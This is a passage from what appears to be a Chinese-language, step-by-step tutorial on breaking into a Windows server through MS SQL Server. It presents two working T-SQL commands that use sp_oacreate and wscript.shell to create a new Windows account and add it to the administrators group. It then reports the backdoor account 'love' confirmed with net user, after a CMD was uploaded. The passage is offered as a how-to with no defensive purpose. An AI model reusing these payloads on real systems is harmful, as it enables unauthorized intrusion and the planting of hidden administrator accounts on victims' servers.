5.刚想进行恢复'XP_CMDShell'时，夹烟发来了另一执行命令:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'(添加用户)

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'(将添加的用户提升为管理员)

知识贴吧： 关于XP_CMDSHELL的恢复与删除，wscript.shell的更多知识，大家可以搜索存储过程相关知识，或需要相关详细解释的，请登陆华夏论坛

结果成功如图14、图15:

（图14）

（图15）
6.添加管理员成功后,上传一个CMD,执行下"net user"发现添加的"love"管理员如图16：
（图16）
7.再用"ipconfig-all"命令查看了一下,如图17：

（图17）

上一页  [1] [2] [3] [4] [5] [6] [7] 下一页